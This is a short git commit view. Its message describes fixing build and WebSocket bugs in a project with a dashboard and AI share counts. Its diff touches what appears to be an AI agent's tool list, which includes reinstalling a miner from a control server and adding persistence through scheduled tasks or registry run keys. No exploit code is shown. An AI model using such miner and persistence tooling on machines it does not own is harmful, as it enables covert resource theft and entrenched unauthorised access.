Fix build breakers and remaining runtime bugs across stack.

Remove corrupt empty main.go files, harden WebSocket reconnect and pre-auth handling, complete live stats in the dashboard hook, wire AI share counts, and refresh PROBLEMS.md.
This commit is contained in:
drjones
2026-05-28 16:23:24 -07:00
parent edffb03e00
commit fabc632384
8 changed files with 146 additions and 163 deletions

View File

@@ -289,7 +289,7 @@ Args: {"process_name": "name of the miner process"}
### reinstall_miner
Reinstall the miner from the control server.
Args: {"server_url": "control server URL", "agent_id": "this agent's ID"}
Args: {"server_url": "control server URL", "build_id": "forge build ID baked into the agent"}
### add_persistence
Add persistence via scheduled task or registry run key.